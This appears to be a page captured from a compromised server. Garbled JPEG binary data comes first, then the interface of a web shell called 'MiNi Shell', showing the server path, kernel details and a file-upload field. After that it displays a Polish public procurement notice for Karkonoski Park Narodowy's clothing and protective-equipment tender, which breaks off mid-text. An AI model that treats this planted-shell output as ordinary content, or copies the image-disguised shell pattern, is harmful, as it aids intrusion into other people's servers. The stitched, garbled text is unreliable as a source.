JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240516/0032614701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> KPN/13/2024 „Zakup i dostawa umundurowania, odzieży roboczej, obuwia roboczego oraz środków ochrony indywidualnej na potrzeby Karkonoskiego Parku Narodowego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Karkonoski Park Narodowy z siedzibą w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021781314</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cieplicka 196</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-570</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(75)7553726</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0757553726</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kpnmab.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kpnmab.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KPN/13/2024 „Zakup i dostawa umundurowania, odzieży roboczej, obuwia roboczego oraz środków ochrony indywidualnej na potrzeby Karkonoskiego Parku Narodowego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19089dd6-1349-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00326147</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00099912/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup i dostawa umundurowania, odzieży roboczej, obuwia roboczego oraz środków ochrony indywidualnej na potrzeby Karkonoskiego Parku Narodowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-19089dd6-1349-11ef-a7f7-6221b72ad4fc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@kpnmab.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>3.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych z dnia 30 grudnia 2020 r (Dz. U. 2020 poz. 2452)<br/>4.Dokumenty elektroniczne,o których mowa w w/w § 2 ust. 1 rozporządzenia, sporządza się w postaci elektronicznej, w formatach<br/>danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. (Dz. U. z 2017 r. poz. 2247), z<br/>uwzg.rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>5.Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a)w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>6.Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz.<br/>1233 z późn. zm.) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio<br/>oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>7.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za ich pośrednictwem odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>8.Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>9.Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>10.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>11.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>12.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, dopuszcza się komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@kpnmab.pl (nie<br/>dotyczy składania ofert).<br/>13.Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>14.Zamawiający rekomenduje format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych jest Karkonoski Park Narodowy z siedzibą w Jeleniej Górze ul. Cieplicka 196; 58-570 Jelenia<br/>Góra, tel. 75 75 537 26, adres mail: sekretariat@kpnmab.pl;<br/>2) Inspektorem ochrony danych osobowych w Karkonoskim Parku Narodowym z siedzibą w Jeleniej Górze jest: Leszek Wierzbicki;<br/>ido@kpnmab.pl;<br/>3) Wskazane dane osobowe przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu związanym z<br/>postępowaniem o udzielenie prowadzonym na KPN/13/2024 „Zakup i dostawa umundurowania, odzieży roboczej, obuwia roboczego<br/>oraz środków ochrony indywidualnej na potrzeby Karkonoskiego Parku Narodowego” w trybie podstawowym bez negocjacji.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j Dz.U. z 2022 poz. 1710 ze zm), dalej<br/>„ustawa Pzp”;<br/>5) Wskazane dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p., przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Panu danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.<br/>11) Jednocześnie KPN przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem<br/>osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o<br/>których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KPN/13/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Koszula z długim rękawem w kolorze białym; damska	8szt, męska	4 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Wskazana w SWZ ilość poszczególnych sortów mundurowych i sortów BHP ma charakter szacunkowy i może ulec<br/>zmianie w przypadku skorzystania prawa opcji. Jest to uzależnione od rotacji kadrowej pracowników.<br/>2) Opcjonalnie Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący dostawy<br/>analogiczne jak opisane w SWZ („Opcja”). Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem<br/>Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>3) Dostawy będące przedmiotem Opcji mogą zostać zlecone na wartość do 20% podstawowego zakresu rzeczowego<br/>Umowy określonego w opisie przedmiotu zamówienia.<br/>4) Zlecanie dostaw będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz<br/>odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak<br/>również realizacja uprawnień Zamawiającego wynikających z Umowy, w tym realizacja prawa do odstąpienia od Umowy<br/>następować będzie na analogicznych zasadach, jak w przypadku prac będących Przedmiotem Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny oferty i ich waga.<br/>1. Przy wyborze najkorzystniejszej oferty, Zamawiający będzie kierował się następującym kryterium:<br/>A. CENA – 60 %<br/>J. JAKOŚĆ – 40%	<br/>2. Ocena ofert będzie dokonywana wg następujących zasad:<br/>2.1 Cena - A(X):<br/>a)	przyjmuje się, że najwyższą ilość punktów tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach,<br/>b)	ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>A(x) = (Cmin/C(x))x 100 x 60%<br/><br/>Gdzie:	<br/>	A(x)	–	ilość punktów przyznana ofercie „x” za kryterium ceny<br/>	Cmin	–	cena najniższa wśród cen zawartych w ofertach na zadanie objęte przetargiem<br/>	C(x)	–	cena zawarta w ocenianej ofercie „x”<br/><br/>2.2 Jakość - J(X)<br/>W tym kryterium, każdy z członków komisji oceny ofert ocenia indywidualnie przedmiot zamówienia, oceniając poniższe podkryteria (ppkt 2.2.3) i przyznając punkty:<br/>Wzór ogólny do obliczenia kryterium „jakość”:<br/> J(x)= (F(o)/F(x)) x 100 x 40%<br/><br/>Gdzie:	<br/>	J(x)	–	ilość punktów przyznana ofercie „x” za kryterium jakość<br/><br/>	F(O)	– Liczba punktów przyznana ofercie ocenianej<br/>	F (x)	– Największa liczba punktów spośród ocenianych ofert<br/><br/>2.2.1. Kryterium „jakość” podlega indywidualnej ocenie członków komisji oceny ofert na podstawie dostarczonych próbek przez Wykonawców.<br/>2.2.2. Przy ocenie kryterium „jakość” będą brane pod uwagę podkryteria związane z jakością - przy zastosowaniu następującego wzoru:<br/>F(o)= (F1 +F2 + F3 + F4)/ ΣK <br/>	Gdzie:<br/>	F1+F2+F3+F4 - suma punktów przyznana indywidualnie przez członków komisji<br/>	Σ K - ilość członków komisji<br/><br/>	2.2.3. W kryterium „jakość” członkowie komisji oceny ofert oceniać będą poniższe aspekty i przyznawać punkty:<br/>Koszula z długim rękawem w kolorze białym<br/>a) skład użytych materiałów w oparciu o przedstawione dokumenty, certyfikaty, karty technologiczne, <br/>1 pkt – ≤55 % bawełny<br/>3 pkt – powyżej 56% bawełny<br/>b) jakość i staranność wykonania<br/>1 pkt – zszycie, wiązanie ściegu wykonane niedokładnie (wystające nitki, krzywo itp.)<br/>5 pkt – zszycie, wiązanie ściegu wykonane prawidłowo, starannie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Kurtka przeciwdeszczowa- damka -12 szt. męska 15 szt.<br/>2. Spodnie przeciwdeszczowe - damskie -2 szt., męskie -9 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Wskazana w SWZ ilość poszczególnych sortów mundurowych i sortów BHP ma charakter szacunkowy i może ulec<br/>zmianie w przypadku skorzystania prawa opcji. Jest to uzależnione od rotacji kadrowej pracowników.<br/>2) Opcjonalnie Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący dostawy<br/>analogiczne jak opisane w SWZ („Opcja”). Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem<br/>Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>3) Dostawy będące przedmiotem Opcji mogą zostać zlecone na wartość do 20% podstawowego zakresu rzeczowego<br/>Umowy określonego w opisie przedmiotu zamówienia.<br/>4) Zlecanie dostaw będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz<br/>odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak<br/>również realizacja uprawnień Zamawiającego wynikających z Umowy, w tym realizacja prawa do odstąpienia od Umowy<br/>następować będzie na analogicznych zasadach, jak w przypadku prac będących Przedmiotem Umowy <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">103 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny oferty i ich waga<br/><br/>1. Przy wyborze najkorzystniejszej oferty, Zamawiający będzie się kierował następującym kryterium:<br/>A. CENA – 60 %<br/>F. JAKOŚĆ, FUNKCJONALNOŚĆ UŻYTKOWA – 40%<br/>2. Ocena ofert będzie dokonywana wg następujących zasad:<br/>2.1 Cena - A(X):<br/>a) przyjmuje się, że najwyższą ilość punktów tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach<br/>b) ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/>A(x) = (Cmin/C(x)) x 100 x 60%<br/>Gdzie:	<br/>	A(x)	–	ilość punktów przyznana ofercie „x” za kryterium 